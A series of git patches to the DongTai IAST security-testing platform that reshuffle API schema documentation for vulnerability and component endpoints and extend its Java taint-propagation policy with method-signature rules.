-456,9 +454,68 @@ def get_graph_and_headers(self, data): ] return res - @extend_schema( + @extend_schema_with_envcheck( + response_bodys=[ + { + "name": _("Get data sample"), + "description": _( + "The aggregation results are programming language, risk level, vulnerability type, project" + ), + "value": { + "status": 201, + "msg": "success", + "data": { + "vul": { + "url": "http://localhost:81/captcha/captchaImage", + "uri": "/captcha/captchaImage", + "agent_name": "Mac OS X-localhost-v1.0.0-d24bf703ca62499ebdd12770708296f5", + "http_method": "GET", + "type": "Weak Random Number Generation", + "taint_position": None, + "first_time": 1631089870, + "latest_time": 1631089961, + "project_name": "demo-4.6.1", + "project_version": "V1.0", + "language": "JAVA", + "level": "LOW", + "level_type": 3, + "counts": 6, + "req_header": 'GET /captcha/captchaImage?type=math HTTP/1.1\nhost:localhost:81\nconnection:keep-alive\nsec-ch-ua:"Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\nsec-ch-ua-platform:"macOS"\naccept:image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8\nsec-fetch-site:same-origin\nsec-fetch-mode:no-cors\nsec-fetch-dest:image\nreferer:http://localhost:81/login\naccept-encoding:gzip, deflate, br\naccept-language:zh-CN,zh;q=0.9\ncookie:JSESSIONID=4bada2e5-d848-4218-8e24-3b28f765b986\n', + "response": "None\n\nNone", + "graph": None, + "context_path": "127.0.0.1", + "client_ip": "127.0.0.1", + "status": "Confirmed", + "taint_value": None, + "param_name": {}, + "method_pool_id": None, + "project_id": 69, + }, + "server": { + "name": "server.name", + "hostname": "localhost", + "ip": "localhost", + "port": 81, + "container": "Apache Tomcat/9.0.41", + "server_type": "apache tomcat", + "container_path": "/Users/erzhuangniu/workspace/vul/demo-4.6.1", + "runtime": "OpenJDK Runtime Environment", + "environment": "java.runtime.name=OpenJDK Runtime Environment, spring.output.ansi.enabled=always, project.name=demo-4.6.1, sun.boot.library.path=/Users/erzhuangniu/Library/Java/JavaVirtualMachines/corretto-1.8.0_292/Contents/Home/jre/lib, java.vm.version=25.292-b10, gop", + "command": "com.ruoyi.demoApplication", + }, + "strategy": { + "desc": "Verifies that weak sources of entropy are not used.", + "sample_code": "", + "repair_suggestion": None, + }, + }, + }, + } + ], + description=_("Use the corresponding id of the vulnerability to query the details of the vulnerability"), summary="获取漏洞详情", - tags=["Vulnerability"], + tags=["Vulnerability", "集成"], + response_schema=_ResponseSerializer, ) def get( self, From a41a7bbcee51fcbd30be61e4430b9b0b211da7b5 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Thu, 14 Sep 2023 18:54:56 +0800 Subject: [PATCH 105/114] feat: add some doc. --- dongtai_web/aggr_vul/app_vul_list.py | 70 +++------------------ dongtai_web/dongtai_sca/views/newpackage.py | 29 ++++----- dongtai_web/views/vul_details.py | 69 ++------------------ 3 files changed, 25 insertions(+), 143 deletions(-) diff --git a/dongtai_web/aggr_vul/app_vul_list.py b/dongtai_web/aggr_vul/app_vul_list.py index d698bcf5a..3157ef330 100644 --- a/dongtai_web/aggr_vul/app_vul_list.py +++ b/dongtai_web/aggr_vul/app_vul_list.py @@ -13,6 +13,7 @@ from dongtai_common.common.utils import make_hash from dongtai_common.endpoint import R, UserEndPoint from dongtai_common.models import APP_LEVEL_RISK, APP_VUL_ORDER +from dongtai_common.models.agent_method_pool import VulMethodPool from dongtai_common.models.dast_integration import IastDastIntegrationRelation from dongtai_common.models.vulnerablity import ( IastVulnerabilityDocument, @@ -22,81 +23,24 @@ from dongtai_common.utils.const import OPERATE_GET from dongtai_common.utils.db import SearchLanguageMode from dongtai_conf import settings -from dongtai_conf.patch import patch_point +from dongtai_conf.patch import patch_point, to_patch from dongtai_conf.settings import ELASTICSEARCH_STATE from dongtai_engine.elatic_search.data_correction import data_correction_interpetor from dongtai_web.aggregation.aggregation_common import turnIntListOfStr from dongtai_web.serializers.aggregation import AggregationArgsSerializer from dongtai_web.serializers.vul import VulSerializer -from rest_framework import serializers -from dongtai_web.utils import get_response_serializer -from drf_spectacular.utils import extend_schema +from dongtai_web.utils import extend_schema_with_envcheck INT_LIMIT: int = 2**64 - 1 -class AppVulSerializer(serializers.ModelSerializer): - level_name = serializers.CharField() - server_type = serializers.CharField() - is_header_vul = serializers.CharField() - agent__project_name = serializers.CharField() - agent__server__container = serializers.CharField() - agent__language = serializers.CharField() - agent__bind_project_id = serializers.CharField() - header_vul_urls = serializers.ListField() - dastvul__vul_type = serializers.CharField() - dastvul_count = serializers.CharField() - dast_validation_status = serializers.CharField() - strategy__vul_name = serializers.CharField() - project__name = serializers.CharField() - server__container = serializers.CharField() - project_version__version_name = serializers.CharField() - - class Meta: - model = IastVulnerabilityModel - fields = [ - "id", - "uri", - "http_method", - "top_stack", - "bottom_stack", - "level_id", - "taint_position", - "status_id", - "first_time", - "latest_time", - "strategy__vul_name", - "language", - "project__name", - "server__container", - "project_id", - "strategy_id", - "project_version_id", - "project_version__version_name", - "level_name", - "server_type", - "is_header_vul", - "agent__project_name", - "agent__server__container", - "agent__language", - "agent__bind_project_id", - "header_vul_urls", - "dastvul__vul_type", - "dastvul_count", - "dast_validation_status", - ] - - -_NewResponseSerializer = get_response_serializer(AppVulSerializer(many=True)) - - class GetAppVulsList(UserEndPoint): - @extend_schema( + @extend_schema_with_envcheck( request=AggregationArgsSerializer, - tags=[_("Vulnerability"), OPERATE_GET, "集成"], + tags=[_("Vulnerability"), OPERATE_GET], summary="应用漏洞列表", - responses={200: _NewResponseSerializer}, ) + @to_patch def post(self, request): """ :param request: @@ -234,6 +178,7 @@ def post(self, request): lambda: 0, {item["iastvul_id"]: item["dastvul_count"] for item in dastvul_rel_count_res}, ) + has_vul_method_pool_set = set(VulMethodPool.objects.filter(vul_id__in=vul_ids).values_list("vul_id", flat=True)) if vul_data: for item in vul_data: item["level_name"] = APP_LEVEL_RISK.get(str(item["level_id"]), "") @@ -247,6 +192,7 @@ def post(self, request): item["dastvul__vul_type"] = dast_vul_types_dict[item["id"]] item["dastvul_count"] = dastvul_rel_count_res_dict[item["id"]] item["dast_validation_status"] = bool(dastvul_rel_count_res_dict[item["id"]]) + item["has_vul_method_pool"] = item["id"] in has_vul_method_pool_set end["data"].append(item) # all Iast Vulnerability Status status = IastVulnerabilityStatus.objects.all() diff --git a/dongtai_web/dongtai_sca/views/newpackage.py b/dongtai_web/dongtai_sca/views/newpackage.py index f290bdb34..dbcd2a57a 100644 --- a/dongtai_web/dongtai_sca/views/newpackage.py +++ b/dongtai_web/dongtai_sca/views/newpackage.py @@ -17,22 +17,14 @@ class PackageListArgsSerializer(serializers.Serializer): page_size = serializers.IntegerField(default=20, help_text=_("Number per page")) page = serializers.IntegerField(default=1, help_text=_("Page index")) - language_ids = serializers.ListField( - required=False, - child=serializers.IntegerField(help_text=_("language")), - help_text="筛选语言id: 1 Java 2 Python 3 PHP 4 Go", - ) - license_ids = serializers.ListField( - required=False, child=serializers.IntegerField(help_text=_("license")), help_text="筛选, 许可证id, 该id范围可在组件概况获取" - ) - level_ids = serializers.ListField( - required=False, child=serializers.IntegerField(help_text=_("level")), help_text="筛选, 危险等级id" - ) - project_id = serializers.IntegerField(required=False, help_text="项目id") - project_version_id = serializers.IntegerField(required=False, help_text="项目版本id") - keyword = serializers.CharField(required=False, help_text="搜索关键字") - order_field = serializers.ChoiceField(["vul_count", "level"], default="vul_count", help_text="排序字段") - order = serializers.ChoiceField(["desc", "asc"], default="desc", help_text="排序方式") + language_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("language"))) + license_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("license"))) + level_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("level"))) + project_id = serializers.IntegerField(required=False, help_text=_("Page index")) + project_version_id = serializers.IntegerField(required=False, help_text=_("Page index")) + keyword = serializers.CharField(required=False, help_text=_("search_keyword")) + order_field = serializers.ChoiceField(["vul_count", "level"], default="vul_count") + order = serializers.ChoiceField(["desc", "asc"], default="desc") class PackeageScaAssetSerializer(PackeageScaAssetDetailSerializer): @@ -57,6 +49,7 @@ class Meta: "language_id", "aql", "vul_count_groupby_level", + "is_focus", ] @@ -66,7 +59,7 @@ class Meta: class PackageList(UserEndPoint): @extend_schema_with_envcheck_v2( request=PackageListArgsSerializer, - tags=[_("Component"), OPERATE_GET, "集成"], + tags=[_("Component"), OPERATE_GET], summary=_("Component List"), responses={200: _NewResponseSerializer}, ) @@ -92,7 +85,7 @@ def post(self, request): q = q & Q(aql__contains=ser.validated_data["keyword"]) order = ("-" if ser.validated_data["order"] == "desc" else "") + ser.validated_data["order_field"] page_info, data = self.get_paginator( - AssetV2Global.objects.filter(q).order_by(order).all(), + AssetV2Global.objects.filter(q).order_by("-is_focus", order).all(), ser.validated_data["page"], ser.validated_data["page_size"], ) diff --git a/dongtai_web/views/vul_details.py b/dongtai_web/views/vul_details.py index b13b05dcd..6aac30b01 100644 --- a/dongtai_web/views/vul_details.py +++ b/dongtai_web/views/vul_details.py @@ -9,6 +9,7 @@ from rest_framework import serializers from dongtai_common.endpoint import R, UserEndPoint +from dongtai_common.models.agent_method_pool import VulMethodPool from dongtai_common.models.hook_type import HookType from dongtai_common.models.project import IastProject from dongtai_common.models.project_version import IastProjectVersion @@ -116,8 +117,8 @@ def get_server(self): "command": "", } + @staticmethod def parse_graphy( - self, graphy, extend_black_list: list | None = None, extend_white_list: list | None = None, @@ -135,7 +136,7 @@ def parse_graphy( results = [] try: - if graphy is None: + if not graphy: return results method_note_pool = json.loads(graphy)[0] method_counts = len(method_note_pool) @@ -327,6 +328,7 @@ def get_vul(self, projects): "method_pool_id": vul.method_pool_id, "project_id": project_id, "is_need_http_detail": is_need_http_detail(strategy_name), + "has_vul_method_pool": VulMethodPool.objects.filter(vul_id=vul.id).exists(), } def get_strategy(self): @@ -454,68 +456,9 @@ def get_graph_and_headers(self, data): ] return res - @extend_schema_with_envcheck( - response_bodys=[ - { - "name": _("Get data sample"), - "description": _( - "The aggregation results are programming language, risk level, vulnerability type, project" - ), - "value": { - "status": 201, - "msg": "success", - "data": { - "vul": { - "url": "http://localhost:81/captcha/captchaImage", - "uri": "/captcha/captchaImage", - "agent_name": "Mac OS X-localhost-v1.0.0-d24bf703ca62499ebdd12770708296f5", - "http_method": "GET", - "type": "Weak Random Number Generation", - "taint_position": None, - "first_time": 1631089870, - "latest_time": 1631089961, - "project_name": "demo-4.6.1", - "project_version": "V1.0", - "language": "JAVA", - "level": "LOW", - "level_type": 3, - "counts": 6, - "req_header": 'GET /captcha/captchaImage?type=math HTTP/1.1\nhost:localhost:81\nconnection:keep-alive\nsec-ch-ua:"Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\nsec-ch-ua-platform:"macOS"\naccept:image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8\nsec-fetch-site:same-origin\nsec-fetch-mode:no-cors\nsec-fetch-dest:image\nreferer:http://localhost:81/login\naccept-encoding:gzip, deflate, br\naccept-language:zh-CN,zh;q=0.9\ncookie:JSESSIONID=4bada2e5-d848-4218-8e24-3b28f765b986\n', - "response": "None\n\nNone", - "graph": None, - "context_path": "127.0.0.1", - "client_ip": "127.0.0.1", - "status": "Confirmed", - "taint_value": None, - "param_name": {}, - "method_pool_id": None, - "project_id": 69, - }, - "server": { - "name": "server.name", - "hostname": "localhost", - "ip": "localhost", - "port": 81, - "container": "Apache Tomcat/9.0.41", - "server_type": "apache tomcat", - "container_path": "/Users/erzhuangniu/workspace/vul/demo-4.6.1", - "runtime": "OpenJDK Runtime Environment", - "environment": "java.runtime.name=OpenJDK Runtime Environment, spring.output.ansi.enabled=always, project.name=demo-4.6.1, sun.boot.library.path=/Users/erzhuangniu/Library/Java/JavaVirtualMachines/corretto-1.8.0_292/Contents/Home/jre/lib, java.vm.version=25.292-b10, gop", - "command": "com.ruoyi.demoApplication", - }, - "strategy": { - "desc": "Verifies that weak sources of entropy are not used.", - "sample_code": "", - "repair_suggestion": None, - }, - }, - }, - } - ], - description=_("Use the corresponding id of the vulnerability to query the details of the vulnerability"), + @extend_schema( summary="获取漏洞详情", - tags=["Vulnerability", "集成"], - response_schema=_ResponseSerializer, + tags=["Vulnerability"], ) def get( self, From bf67576a9eee449c315e7293021415011d768f34 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Thu, 14 Sep 2023 18:59:30 +0800 Subject: [PATCH 106/114] feat: add some doc. --- dongtai_web/aggr_vul/app_vul_list.py | 62 +++++++++++++++++++- dongtai_web/dongtai_sca/views/newpackage.py | 26 ++++++--- dongtai_web/views/vul_details.py | 63 ++++++++++++++++++++- 3 files changed, 138 insertions(+), 13 deletions(-) diff --git a/dongtai_web/aggr_vul/app_vul_list.py b/dongtai_web/aggr_vul/app_vul_list.py index 3157ef330..ee42a7cdf 100644 --- a/dongtai_web/aggr_vul/app_vul_list.py +++ b/dongtai_web/aggr_vul/app_vul_list.py @@ -30,14 +30,72 @@ from dongtai_web.serializers.aggregation import AggregationArgsSerializer from dongtai_web.serializers.vul import VulSerializer from dongtai_web.utils import extend_schema_with_envcheck +from rest_framework import serializers +from dongtai_web.utils import get_response_serializer +from drf_spectacular.utils import extend_schema INT_LIMIT: int = 2**64 - 1 +class AppVulSerializer(serializers.ModelSerializer): + level_name = serializers.CharField() + server_type = serializers.CharField() + is_header_vul = serializers.CharField() + agent__project_name = serializers.CharField() + agent__server__container = serializers.CharField() + agent__language = serializers.CharField() + agent__bind_project_id = serializers.CharField() + header_vul_urls = serializers.ListField() + dastvul__vul_type = serializers.CharField() + dastvul_count = serializers.CharField() + dast_validation_status = serializers.CharField() + strategy__vul_name = serializers.CharField() + project__name = serializers.CharField() + server__container = serializers.CharField() + project_version__version_name = serializers.CharField() + + class Meta: + model = IastVulnerabilityModel + fields = [ + "id", + "uri", + "http_method", + "top_stack", + "bottom_stack", + "level_id", + "taint_position", + "status_id", + "first_time", + "latest_time", + "strategy__vul_name", + "language", + "project__name", + "server__container", + "project_id", + "strategy_id", + "project_version_id", + "project_version__version_name", + "level_name", + "server_type", + "is_header_vul", + "agent__project_name", + "agent__server__container", + "agent__language", + "agent__bind_project_id", + "header_vul_urls", + "dastvul__vul_type", + "dastvul_count", + "dast_validation_status", + ] + + +_NewResponseSerializer = get_response_serializer(AppVulSerializer(many=True)) + + class GetAppVulsList(UserEndPoint): - @extend_schema_with_envcheck( + @extend_schema( request=AggregationArgsSerializer, - tags=[_("Vulnerability"), OPERATE_GET], + tags=[_("Vulnerability"), OPERATE_GET, "集成"], summary="应用漏洞列表", ) @to_patch diff --git a/dongtai_web/dongtai_sca/views/newpackage.py b/dongtai_web/dongtai_sca/views/newpackage.py index dbcd2a57a..ecae1cb81 100644 --- a/dongtai_web/dongtai_sca/views/newpackage.py +++ b/dongtai_web/dongtai_sca/views/newpackage.py @@ -17,14 +17,22 @@ class PackageListArgsSerializer(serializers.Serializer): page_size = serializers.IntegerField(default=20, help_text=_("Number per page")) page = serializers.IntegerField(default=1, help_text=_("Page index")) - language_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("language"))) - license_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("license"))) - level_ids = serializers.ListField(required=False, child=serializers.IntegerField(help_text=_("level"))) - project_id = serializers.IntegerField(required=False, help_text=_("Page index")) - project_version_id = serializers.IntegerField(required=False, help_text=_("Page index")) - keyword = serializers.CharField(required=False, help_text=_("search_keyword")) - order_field = serializers.ChoiceField(["vul_count", "level"], default="vul_count") - order = serializers.ChoiceField(["desc", "asc"], default="desc") + language_ids = serializers.ListField( + required=False, + child=serializers.IntegerField(help_text=_("language")), + help_text="筛选语言id: 1 Java 2 Python 3 PHP 4 Go", + ) + license_ids = serializers.ListField( + required=False, child=serializers.IntegerField(help_text=_("license")), help_text="筛选, 许可证id, 该id范围可在组件概况获取" + ) + level_ids = serializers.ListField( + required=False, child=serializers.IntegerField(help_text=_("level")), help_text="筛选, 危险等级id" + ) + project_id = serializers.IntegerField(required=False, help_text="项目id") + project_version_id = serializers.IntegerField(required=False, help_text="项目版本id") + keyword = serializers.CharField(required=False, help_text="搜索关键字") + order_field = serializers.ChoiceField(["vul_count", "level"], default="vul_count", help_text="排序字段") + order = serializers.ChoiceField(["desc", "asc"], default="desc", help_text="排序方式") class PackeageScaAssetSerializer(PackeageScaAssetDetailSerializer): @@ -59,7 +67,7 @@ class Meta: class PackageList(UserEndPoint): @extend_schema_with_envcheck_v2( request=PackageListArgsSerializer, - tags=[_("Component"), OPERATE_GET], + tags=[_("Component"), OPERATE_GET, "集成"], summary=_("Component List"), responses={200: _NewResponseSerializer}, ) diff --git a/dongtai_web/views/vul_details.py b/dongtai_web/views/vul_details.py index 6aac30b01..1c81b2db4 100644 --- a/dongtai_web/views/vul_details.py +++ b/dongtai_web/views/vul_details.py @@ -456,9 +456,68 @@ def get_graph_and_headers(self, data): ] return res - @extend_schema( + @extend_schema_with_envcheck( + response_bodys=[ + { + "name": _("Get data sample"), + "description": _( + "The aggregation results are programming language, risk level, vulnerability type, project" + ), + "value": { + "status": 201, + "msg": "success", + "data": { + "vul": { + "url": "http://localhost:81/captcha/captchaImage", + "uri": "/captcha/captchaImage", + "agent_name": "Mac OS X-localhost-v1.0.0-d24bf703ca62499ebdd12770708296f5", + "http_method": "GET", + "type": "Weak Random Number Generation", + "taint_position": None, + "first_time": 1631089870, + "latest_time": 1631089961, + "project_name": "demo-4.6.1", + "project_version": "V1.0", + "language": "JAVA", + "level": "LOW", + "level_type": 3, + "counts": 6, + "req_header": 'GET /captcha/captchaImage?type=math HTTP/1.1\nhost:localhost:81\nconnection:keep-alive\nsec-ch-ua:"Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\nsec-ch-ua-platform:"macOS"\naccept:image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8\nsec-fetch-site:same-origin\nsec-fetch-mode:no-cors\nsec-fetch-dest:image\nreferer:http://localhost:81/login\naccept-encoding:gzip, deflate, br\naccept-language:zh-CN,zh;q=0.9\ncookie:JSESSIONID=4bada2e5-d848-4218-8e24-3b28f765b986\n', + "response": "None\n\nNone", + "graph": None, + "context_path": "127.0.0.1", + "client_ip": "127.0.0.1", + "status": "Confirmed", + "taint_value": None, + "param_name": {}, + "method_pool_id": None, + "project_id": 69, + }, + "server": { + "name": "server.name", + "hostname": "localhost", + "ip": "localhost", + "port": 81, + "container": "Apache Tomcat/9.0.41", + "server_type": "apache tomcat", + "container_path": "/Users/erzhuangniu/workspace/vul/demo-4.6.1", + "runtime": "OpenJDK Runtime Environment", + "environment": "java.runtime.name=OpenJDK Runtime Environment, spring.output.ansi.enabled=always, project.name=demo-4.6.1, sun.boot.library.path=/Users/erzhuangniu/Library/Java/JavaVirtualMachines/corretto-1.8.0_292/Contents/Home/jre/lib, java.vm.version=25.292-b10, gop", + "command": "com.ruoyi.demoApplication", + }, + "strategy": { + "desc": "Verifies that weak sources of entropy are not used.", + "sample_code": "", + "repair_suggestion": None, + }, + }, + }, + } + ], + description=_("Use the corresponding id of the vulnerability to query the details of the vulnerability"), summary="获取漏洞详情", - tags=["Vulnerability"], + tags=["Vulnerability", "集成"], + response_schema=_ResponseSerializer, ) def get( self, From 4976e470d8eb880279edc53eccbb22a706ef493c Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 15 Sep 2023 10:13:11 +0800 Subject: [PATCH 107/114] feat: add some doc. --- dongtai_web/aggr_vul/app_vul_list.py | 5 ++--- dongtai_web/views/vul_details.py | 1 - 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/dongtai_web/aggr_vul/app_vul_list.py b/dongtai_web/aggr_vul/app_vul_list.py index ee42a7cdf..9dce56a7f 100644 --- a/dongtai_web/aggr_vul/app_vul_list.py +++ b/dongtai_web/aggr_vul/app_vul_list.py @@ -6,8 +6,10 @@ from django.core.cache import cache from django.db.models import Count, F from django.utils.translation import gettext_lazy as _ +from drf_spectacular.utils import extend_schema from elasticsearch import Elasticsearch from elasticsearch_dsl import Q +from rest_framework import serializers from rest_framework.serializers import ValidationError from dongtai_common.common.utils import make_hash @@ -29,10 +31,7 @@ from dongtai_web.aggregation.aggregation_common import turnIntListOfStr from dongtai_web.serializers.aggregation import AggregationArgsSerializer from dongtai_web.serializers.vul import VulSerializer -from dongtai_web.utils import extend_schema_with_envcheck -from rest_framework import serializers from dongtai_web.utils import get_response_serializer -from drf_spectacular.utils import extend_schema INT_LIMIT: int = 2**64 - 1 diff --git a/dongtai_web/views/vul_details.py b/dongtai_web/views/vul_details.py index 1c81b2db4..2efbf635e 100644 --- a/dongtai_web/views/vul_details.py +++ b/dongtai_web/views/vul_details.py @@ -5,7 +5,6 @@ from django.db.models.base import ObjectDoesNotExist from django.utils.translation import gettext_lazy as _ -from drf_spectacular.utils import extend_schema from rest_framework import serializers from dongtai_common.endpoint import R, UserEndPoint From a40199a05b96673236bac2a4855940aa0484d050 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 15 Sep 2023 11:24:53 +0800 Subject: [PATCH 108/114] feat: update new strategy. --- static/data/java_full_policy.json | 3108 +++++++++++++++++++++++------ static/data/java_policy.json | 2278 ++++++++++++++++----- 2 files changed, 4298 insertions(+), 1088 deletions(-) diff --git a/static/data/java_full_policy.json b/static/data/java_full_policy.json index b467a5bdc..01c97275c 100644 --- a/static/data/java_full_policy.json +++ b/static/data/java_full_policy.json @@ -80,6 +80,24 @@ }, { "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "java.nio.ByteBuffer.array()" + }, { "command": "SUBSET(P2,P3)", "created_by": 1, @@ -2224,76 +2242,80 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [], + "tags": [ + "html-encoded" + ], "target": "R", "track": "false", "type": 1, - "untags": [], - "value": "com.github.pagehelper.parser.CountSqlParser.getSmartCountSql(java.lang.String,java.lang.String)" + "untags": [ + "html-decoded" + ], + "value": "com.bea.jsptools.tree.TreeNode.htmlChars(java.lang.String)" }, { - "command": "APPEND()", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "java.lang.AbstractStringBuilder.append(java.lang.String)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],com.fasterxml.jackson.core.type.TypeReference)" }, { - "command": "SUBSET(P1,P2,P4)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "P3", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "java.lang.AbstractStringBuilder.getChars(int,int,char[],int)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],com.fasterxml.jackson.databind.JavaType)" }, { - "command": "SUBSET(0,P1)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "java.lang.AbstractStringBuilder.setLength(int)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],int,int,com.fasterxml.jackson.core.type.TypeReference)" }, { - "command": "SUBSET(P1)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2301,17 +2323,17 @@ "track": "false", "type": 1, "untags": [], - "value": "java.lang.AbstractStringBuilder.substring(int)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],int,int,com.fasterxml.jackson.databind.JavaType)" }, { - "command": "SUBSET(P1,P2)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2319,64 +2341,64 @@ "track": "false", "type": 1, "untags": [], - "value": "java.lang.AbstractStringBuilder.substring(int,int)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],java.lang.Class)" }, { - "command": "KEEP()", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.(java.lang.CharSequence)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,com.fasterxml.jackson.core.type.TypeReference)" }, { - "command": "KEEP()", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.(java.lang.String)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.Reader,java.lang.Class)" }, { - "command": "APPEND(P2,P3,0)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.append(char[],int,int)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,com.fasterxml.jackson.core.type.TypeReference)" }, { - "command": "APPEND()", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, @@ -2387,14 +2409,14 @@ "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.append(java.lang.CharSequence)" + "value": "com.github.pagehelper.parser.CountSqlParser.getSmartCountSql(java.lang.String,java.lang.String)" }, { - "command": "APPEND(P2,P3)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, @@ -2404,12 +2426,16 @@ "source": "P1", "stack_blacklist": [], "system_type": 1, - "tags": [], - "target": "O", - "track": "", + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", "type": 1, - "untags": [], - "value": "java.lang.StringBuilder.append(java.lang.CharSequence,int,int)" + "untags": [ + "html-decoded" + ], + "value": "com.opensymphony.util.TextUtils.htmlEncode(java.lang.String)" }, { "command": "", @@ -2424,13 +2450,13 @@ "system_type": 1, "tags": [], "target": "O", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.append(java.lang.Object)" + "value": "java.io.CharArrayWriter.append(java.lang.CharSequence)" }, { - "command": "APPEND()", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, @@ -2442,31 +2468,31 @@ "system_type": 1, "tags": [], "target": "O", - "track": "", + "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.append(java.lang.String)" + "value": "java.io.CharArrayWriter.append(java.lang.CharSequence,int,int)" }, { - "command": "APPEND()", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.append(java.lang.StringBuffer)" + "value": "java.io.CharArrayWriter.toCharArray()" }, { - "command": "REMOVE(P1,P2)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, @@ -2477,21 +2503,21 @@ "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", + "target": "R", "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.delete(int,int)" + "value": "java.io.CharArrayWriter.toString()" }, { - "command": "REMOVE(P1)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -2499,35 +2525,35 @@ "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.deleteCharAt(int)" + "value": "java.io.CharArrayWriter.write(char[],int,int)" }, { - "command": "SUBSET(P1,P2,P4)", + "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "P3", + "target": "O", "track": "false", "type": 1, "untags": [], - "value": "java.lang.StringBuilder.getChars(int,int,char[],int)" + 